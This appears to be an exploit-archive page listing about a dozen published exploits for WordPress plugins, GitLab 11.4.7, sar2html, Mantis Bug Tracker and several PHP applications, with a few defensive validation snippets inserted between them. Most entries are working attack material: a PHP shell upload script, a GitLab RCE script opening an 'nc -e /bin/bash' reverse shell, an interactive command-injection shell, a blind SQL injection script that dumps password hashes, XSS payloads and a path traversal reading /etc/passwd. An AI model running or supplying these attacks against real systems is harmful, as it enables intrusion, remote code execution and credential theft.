All posts published by ISHACK AI BOT
-
WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/angwp
# Date: 23/12/2020
# Exploit Author: spacehen
# Vendor Homepage: http://adning.com/
# Version: <1.5.6
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests
import sys

def print_banner():
    print("Adning Advertising < 1.5.6 - Arbitrary File Upload")
    print("Author -> space_hen (www.lunar.sh)")

def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.php")

def vuln_check(uri):
    response = requests.get(uri)
    raw = response.text
    if ("no files found" in raw):
        return True
    else:
        return False

def main():
    print_banner()
    if(len(sys.argv) != 3):
        print_usage()
        sys.exit(1)

    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = '_ning_upload_image'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action

    check = vuln_check(uri)
    if(check == False):
        print("(*) Target not vulnerable!")
        sys.exit(1)

    if( path.isfile(file_path) == False):
        print("(*) Invalid file!")
        sys.exit(1)

    files = {'files[]' : open(file_path)}
    data = {
        "allowed_file_types" : "php,jpg,jpeg",
        "upload" : json.dumps({"dir" : "../"})
    }

    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data )
    file_name = path.basename(file_path)
    if(file_name in response.text):
        print("Shell Uploaded!")
        if(base[-1] != '/'):
            base += '/'
        print(base + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)

main()
-
Baby Care System 1.0 - 'roleid' SQL Injection
# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-23
# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
# Affected Version: Version 1
# Tested on Kali Linux

Step 1. Log in to the application with admin credentials.
Step 2. Click on "MENUS" on the left side and then edit any "Page Role".
Step 3. On the edit page, the URL should be:
http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7
Step 4. Run sqlmap on the URL where the "roleid" parameter is given

sqlmap -u "http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7" --banner

---
Parameter: roleid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND 'IPDn'='IPDn

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM (SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL-- -
---
[05:32:00] [INFO] the back-end DBMS is MySQL
[05:32:00] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---

Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.
-
WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting
# Exploit Title: WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting
# Date: 20-12-2018
# Software Link: https://wordpress.org/plugins/wp-postratings/
# Exploit Author: Park Won Seok
# Version: wp-postratings.1.86
# Tested on: Windows 10 x64

# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins wp-postratings.1.86
# One parameter (postratings_image) has Cross-Site Scripting.

# POC
# XSS Stored

POST http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1
Host: localhost
Content-Length: 1765
Cache-Control: max-age=0
Origin: localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings%2Fpostratings-options.php
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cff47715fb398e65023b74d3aad0d0429061e90422614399cf1cffb88df424173; wp-settings-1=deleted; wp-settings-time-1=1545201993; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cd63f851c891cd0792c2c7e5a2d62342ffb57501777f1e8f0e9c13b8ff0daacc2
Connection: close

_wpnonce=b841885588&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-postratings%2Fpostratings-options.php&postratings_customrating=0&postratings_template_vote=%25RATINGS_IMAGES_VOTE%25+%28%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_text=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%2C+%3Cstrong%3Erated%3C%2Fstrong%3E%3C%2Fem%3E%29&postratings_template_permission=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%3C%2Fem%3E%29%3Cbr+%2F%3E%3Cem%3EYou+need+to+be+a+registered+member+to+rate+this.%3C%2Fem%3E&postratings_template_none=%25RATINGS_IMAGES_VOTE%25+%28No+Ratings+Yet%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_highestrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22+title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+%25RATINGS_IMAGES%25+%28%25RATINGS_AVERAGE%25+out+of+%25RATINGS_MAX%25%29%3C%2Fli%3E&postratings_template_mostrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22++title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+-+%25RATINGS_USERS%25+votes%3C%2Fli%3E& [postratings_image=stars\"onerror=alert(1) --]&postratings_max=2&postratings_richsnippet=0&postratings_ratingstext%5B%5D=1+Star&postratings_ratingsvalue%5B%5D=%2B1&postratings_ratingstext%5B%5D=&postratings_ratingsvalue%5B%5D=0&postratings_ajax_style_loading=1&postratings_ajax_style_fading=1&postratings_allowtorate=2&postratings_logging_method=3&Submit=Save+Changes
-
Apartment Visitors Management System 1.0 - Authentication Bypass
# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass
# Date: 2020-12-24
# Exploit Author: Kshitiz Raj(manitorpotterk)
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: V1.0
# Tested on: Windows 10/Kali Linux

Step 1 - Go to url http://localhost/avms/index.php
Step 2 - Enter Username: ' or '1'='1'#
Step 3 - Enter Password: anything
-
MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
# Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
# Discovery by: Thalia Nieto
# Discovery Date: 02/01/21
# Vendor Homepage: https://www.minitool.com
# Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/
# Tested Version: 3.2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, name | findstr /i "MTAgentService"

MTAgentService  MTAgentService  C:\Program Files\MiniTool ShadowMaker\AgentService.exe

# Service info:

C:\>sc qc "MTAgentService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MTAgentService
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\MiniTool ShadowMaker\AgentService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MTAgentService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem
-
GitLab 11.4.7 - RCE (Authenticated) (2)
# Exploit Title: GitLab 11.4.7 RCE (POC)
# Date: 24th December 2020
# Exploit Author: Norbert Hofmann
# Exploit Modifications: Sam Redmond, Tam Lai Yin
# Original Author: Mohin Paramasivam
# Software Link: https://gitlab.com/
# Environment: GitLab 11.4.7, community edition
# CVE: CVE-2018-19571 + CVE-2018-19585

#!/usr/bin/python3
import requests
from bs4 import BeautifulSoup
import argparse
import random

parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE')
parser.add_argument('-u', help='GitLab Username/Email', required=True)
parser.add_argument('-p', help='Gitlab Password', required=True)
parser.add_argument('-g', help='Gitlab URL (without port)', required=True)
parser.add_argument('-l', help='reverse shell ip', required=True)
parser.add_argument('-P', help='reverse shell port', required=True)
args = parser.parse_args()

username = args.u
password = args.p
gitlab_url = args.g + ":5080"
local_ip = args.l
local_port = args.P

session = requests.Session()

# Get Authentication Token
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
print(f"[+] authenticity_token: {token}")

login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}

r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
if r.status_code != 200:
    exit(f"Login Failed:{r.text}")

# Create project
import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git"
project_name = f'project{random.randrange(1, 10000)}'
project_url = f'{gitlab_url}/{username}'
print(f"[+] Creating project with random name: {project_name}")

form = """\nmulti
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
exec
exec
exec\n"""

r = session.get(f"{gitlab_url}/projects/new")
soup = BeautifulSoup(r.text, features="lxml")
namespace_id = soup.find(
    'input', {'name': 'project[namespace_id]'}).get('value')
project_token = soup.findAll('meta')[16].get("content")
project_token = project_token.replace("==", "%3D%3D")
project_token = project_token.replace("+", "%2B")

payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"

cookies = {
    'sidebar_collapsed': 'false',
    'event_filter': 'all',
    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
    '_gitlab_session': session.cookies['_gitlab_session'],
}

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': f'{gitlab_url}/projects',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '398',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1',
}

print("[+] Running Exploit")
r = session.post(
    gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False)

if "The change you requested was rejected." in r.text:
    exit('Exploit failed, check input params')

print('[+] Exploit completed successfully!')
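The project-creation request above smuggles an import URL whose host is an IPv4-mapped IPv6 loopback address (`[0:0:0:0:0:ffff:127.0.0.1]`) on the Redis port. The following is an added defensive example, not the exploit's code and not GitLab's own validation: a pre-check for a "repository import URL" field that unwraps IPv4-mapped addresses before testing for loopback/private ranges and that only admits the default ports of the allowed schemes. The function names, the allowed scheme and port sets, and the blocked-name list are assumptions; a real deployment must also resolve host names and test every returned address, which this offline check does not do.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed policy for an import-URL field (hypothetical, not GitLab's configuration).
ALLOWED_SCHEMES = {"http", "https", "git"}
# Default ports of the allowed schemes; anything else (6379 for Redis, for example) is refused.
ALLOWED_PORTS = {None, 80, 443, 9418}
BLOCKED_NAMES = {"localhost", "localhost.localdomain"}


def is_internal_address(host: str) -> bool:
    """True for loopback, private, link-local, multicast, reserved or unspecified addresses.

    IPv4-mapped IPv6 addresses (::ffff:127.0.0.1, also written 0:0:0:0:0:ffff:127.0.0.1)
    are unwrapped to the IPv4 address first: the IPv6 object's own is_loopback flag does
    not look through the mapping, which is exactly the gap the exploit's URL relies on.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: only a small deny-list of names can be checked offline.
        return host.lower().rstrip(".") in BLOCKED_NAMES
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_import_url(url: str):
    """Return (ok, reason) for a user-supplied import URL."""
    try:
        parts = urlsplit(url)          # newer Pythons reject malformed bracketed hosts here
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname             # brackets stripped, lowercased
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    if is_internal_address(host):
        return False, f"host {host!r} is an internal address"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the decoded form of the exploit's import URL and a few controls.
    for candidate in [
        "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/.git",
        "git://[::ffff:127.0.0.1]/test/.git",
        "http://10.0.0.5/repo.git",
        "https://github.com/example/repo.git",
    ]:
        print(candidate, "->", validate_import_url(candidate))
```

The port check and the address check are independent on purpose: the exploit's URL fails both, so loosening one policy (allowing extra ports, say) does not reopen the Redis path.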
-
Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
# Date: 22.12.2020
# Software Link: http://www.tucows.com/download/windows/files/ezcdsetup.exe
# Exploit Author: Achilles
# Tested Version: 4.13
# Tested on: Windows 7 x64 Sp1

# 1.- Run python code :Creator.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Easy CD & DVD Cover Creator.exe
# 4.- Press Unlock Now
# 5.- Paste the content of EVIL.txt into the Field: 'Serial Number'
# 6.- Press 'Continue' and you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 6000

try:
    # the file handle must be kept, otherwise f.write() below fails
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")
-
Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection
# Date: 30/12/2020
# Exploit Author: EthicalHCOP
# Vendor Homepage: https://www.mantisbt.org/
# Version: 2.24.3
# CVE: CVE-2020-28413

import requests, sys, time
from lxml import etree

proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

def Hacer_Peticion(query):
    home = ""
    url = home+"/api/soap/mantisconnect.php"
    headers = {'content-type': 'text/xml', 'SOAPAction': url+'"/mc_project_get_users"'}
    mantis_db_user = ""
    mantis_db_pass = ""
    body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect">
    <soapenv:Header/>
    <soapenv:Body>
        <man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <username xsi:type="xsd:string">"""+mantis_db_user+"""</username>
            <password xsi:type="xsd:string">"""+mantis_db_pass+"""</password>
            <project_id xsi:type="xsd:integer">0</project_id>
            <access xsi:type="xsd:string">"""+query+"""</access>
        </man:mc_project_get_users>
    </soapenv:Body>
</soapenv:Envelope>"""
    response = requests.post(url, data=body, headers=headers, verify=False)
    #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False)
    parser = etree.XMLParser(remove_blank_text=True)
    xml = etree.XML(response.content, parser)
    xml = etree.tostring(xml)
    return(str(xml))

def Cantidad_Usuarios_Mantis():
    query = "0 union all select concat('-',(select count(*) " \
            "from mantis_user_table),'0'),2,3,4 order by id asc limit 1"
    xml = Hacer_Peticion(query)
    txt = xml.split("integer")
    txt = txt[1].split("id")
    registros = str(str(str(txt[0])[:-2])[-2:])[:-1]
    return(registros)

def Obtener_Id(usr_pos):
    query = "0 union all select concat((SELECT id FROM mantis_user_table " \
            "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1"
    xml = Hacer_Peticion(query)
    txt = xml.split("integer")
    txt = txt[1].split("id")
    id = str(str(txt[0])[:-2])[-1:]
    name = str(str(txt[1])[29:]).split("</name>")[0]
    return (id+"-"+name)

def brute_force(data):
    charts = "abcdefghijklmnopqrstuvwxyz0123456789"
    passw = ""
    id = data.split("-")[0]
    name = data.split("-")[1]
    for cp in range (1,33,1):
        for c in charts:
            print(f"\rHash: {passw}", end="")
            time.sleep(0.00001)
            sys.stdout.flush()
            query = "0 union all select (select if(substring((select binary(password) " \
                    "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1"
            xml = Hacer_Peticion(query)
            txt = xml.split("integer")
            txt = txt[1].split("id")
            r_id = str(str(txt[0])[:-2])[-1:]
            if(r_id=="0"):
                passw = passw + str(c)
                break
    print(f"\r", end="")
    sys.stdout.flush()
    print(name+": "+passw)

def main():
    cantidad_users = Cantidad_Usuarios_Mantis()
    print("Cantidad usuarios en db: "+str(cantidad_users))
    print("Obteniendo Hashes...")
    for x in range(0,int(cantidad_users),1):
        brute_force(Obtener_Id(x))

if __name__ == "__main__":
    main()
-
4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Ritesh Gohil
# Vendor Homepage: https://www.4homepages.de/
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.7.11
# Tested on: Windows 10/Kali Linux

Vulnerable Parameters: Profile Image.

Attack Vector: This vulnerability can result in an attacker injecting the XSS payload into the IMAGE URL; each time any user goes to that URL the XSS triggers, and the attacker is able to steal the cookie according to the crafted payload.

Steps-To-Reproduce:
1. Login into 4images admin panel.
2. Now go to the add images tab.
3. Now paste the below payload in the URL field.
ritesh"><img src=x onerror=confirm(1)>
4. Now click on add button.
5. The XSS will be triggered.
-
Wordpress Core 5.2.2 - 'post previews' XSS
# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS
# Date: 31/12/2020
# Exploit Author: gx1 <g.per45[at]gmail.com>
# Vulnerability Discovery: Simon Scannell
# Vendor Homepage: https://wordpress.com/
# Software Link: https://github.com/WordPress/WordPress
# Version: <= 5.2.2
# Tested on: any
# CVE: CVE-2019-16223
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-16223
# https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/

Description:
WordPress before 5.2.3 allows XSS in post previews by authenticated users.

Technical Details and Exploitation:

The vulnerability is due to two conditions:

1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to a cross-site scripting vulnerability: the function sanitizes bad protocols, and applies a conversion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for HTML entities after two points, as it is possible to observe from the applied fix:

============================================================================================================================================
function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) {
+	$string  = preg_replace( '/(&#0*58(?![;0-9])|&#x0*3a(?![;a-f0-9]))/i', '$1;', $string ); # APPLIED FIX AFTER VULNERABILITY DETECTION
	$string2 = preg_split( '/:|&#0*58;|&#x0*3a;/i', $string, 2 );
	if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) {
============================================================================================================================================

This allows an attacker to inject attack strings such as:

============================================================================================================================================
<a href="javascript:alert(document.domain)">Example Attack</a>
============================================================================================================================================

Anyway, Wordpress protects against this attack because it converts any type of HTML entities during the rendering of posts. In a particular case, during preview, it is possible to inject HTML entities in a URL. That is the second condition.

2. During preview, the get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity:

============================================================================================================================================
function get_the_content( $more_link_text = null, $strip_teaser = false ) {
	...
	if ( $preview ) // Preview fix for JavaScript bug with foreign languages.
		$output = preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output );

	return $output;
}

function _convert_urlencoded_to_entities( $match ) {
	return '&#' . base_convert( $match[1], 16, 10 ) . ';';
}
============================================================================================================================================

For this reason, it is possible to send URL encoded strings that will be converted into HTML entities during preview. HTML entities can be crafted to bypass the wp_kses_bad_protocol_once() function due to the issue described in condition 1.

Proof Of Concept:

1. Create a new post
2. Insert in the code editor the following HTML PoC code:
<a href="javascript%u003Aalert(/XSS/)">poc</a>
3. Click on preview and click the "poc" link

Solution:
Upgrade Wordpress to version >= 5.2.3
-
sar2html 3.2.1 - 'plot' Remote Code Execution
# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "

    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()
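The injection above works because the `plot` value (a host name to chart) reaches a shell command, so `;` terminates the intended command and starts another. The following is an added defensive example, not sar2html's code and not the exploit author's: a hypothetical request handler that accepts only a syntactically valid host name that is also in a server-side list of known hosts, and that builds an argument vector for `sar` instead of a shell string. The handler names, the `known_hosts` list and the `/var/log/sa/<host>/sa01` data layout are assumptions for the demonstration.

```python
import re
import subprocess

# RFC 1123 style host name: labels of 1-63 letters, digits or hyphens, no leading/trailing
# hyphen, joined by dots. Nothing else is accepted from the request.
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


class BadParameter(ValueError):
    """Raised when the plot parameter fails validation."""


def resolve_plot_host(plot, known_hosts):
    """Return the host name only if it is well-formed AND one the server already knows.

    The allow-list is the real control: the regex alone would still let an attacker
    probe arbitrary file names, it just cannot contain shell metacharacters.
    """
    if not isinstance(plot, str) or not HOST_RE.match(plot):
        raise BadParameter(f"rejected plot value {plot!r}")
    if plot not in known_hosts:
        raise BadParameter(f"unknown host {plot!r}")
    return plot


def build_sar_argv(plot, known_hosts, data_dir="/var/log/sa"):
    """Argument vector for sar (assumed per-host data layout).

    An argv list is passed to the kernel as-is, so even if validation were loosened,
    ';', '|' or '$()' would reach sar as literal characters of a file name rather than
    as command separators.
    """
    host = resolve_plot_host(plot, known_hosts)
    return ["sar", "-u", "-f", f"{data_dir}/{host}/sa01"]


def run_plot(plot, known_hosts):
    """Execute the validated command without a shell (shell=False is the default)."""
    return subprocess.run(build_sar_argv(plot, known_hosts),
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # Constructed server-side inventory and request values.
    KNOWN = ["web01", "db01.example.internal"]
    for value in ["web01", ";id", "web01;id", "$(id)", "web02"]:
        try:
            print(value, "->", build_sar_argv(value, KNOWN))
        except BadParameter as exc:
            print(value, "->", exc)
```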
-
Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Date: Fri, 11 Dec 2020
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598

http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
-
Knockpy 4.1.1 - CSV Injection
# Exploit Title: Knockpy 4.1.1 - CSV Injection
# Author: Dolev Farhi
# Date: 2020-12-29
# Vendor Homepage: https://github.com/guelfoweb/knock
# Version : 4.1.1
# Tested on: Debian 9.13

Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.

Vulnerable code segment(s)

# knockpy.py
# row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
# subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))

# modules/save_report.py
# if fields:
#     csv_report += 'ip,status,type,domain_name,server\n'
# for item in report:
#     csv_report += item + '\n'
# report = csv_report

1. Example malicious Nginx config to return CSV formula headers:

http {
    ...
    server_tokens off;
    more_set_headers 'Server: =1336+1';
    ...
}

2. Tester runs Knockpy

root@host:~/# python knockpy/knockpy.py -c test.local

+ checking for virustotal subdomains: SKIP
    VirusTotal API_KEY not found
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
- scanning for subdomain...

Ip Address      Status  Type    Domain Name             Server
----------      ------  ----    -----------             ------
127.0.0.1       200     host    appserver.test.local    =1336+1

CSV result

root@host:~/# cat test_local.csv
127.0.0.1,200,host,appserver.test.local,=1336+1
127.0.0.1,200,host,www.test.local,=1336+1
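The vulnerable segment concatenates the attacker-controlled Server header straight into a CSV row, so a spreadsheet opening the report evaluates it as a formula. The following is an added defensive example, not Knockpy's code: the same five columns written with the standard `csv` module (which handles quoting of commas and quotes) after every cell is checked for a formula-leading character and, if needed, prefixed with a single quote so the cell is read as text. The function names and the sample rows are constructed for the demonstration; the `=1336+1` value is the one from the advisory.

```python
import csv
import io

# First characters that make common spreadsheets evaluate a cell as a formula.
# Tab and carriage return are the less obvious members of the set.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value) -> str:
    """Return a cell value no spreadsheet will evaluate as a formula.

    A leading apostrophe forces text interpretation. Leading whitespace is looked
    through because spreadsheets trim it before deciding. Values such as "-1" are
    quoted too; that is the accepted cost of a simple rule.
    """
    text = str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def write_report(rows, fields=("ip", "status", "type", "domain_name", "server")) -> str:
    """Serialise rows as CSV with every cell neutralized and every field quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fields)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample rows in Knockpy's report shape. The Server column is the
# untrusted value; the first two rows carry formula payloads, the third is benign.
SAMPLE_ROWS = [
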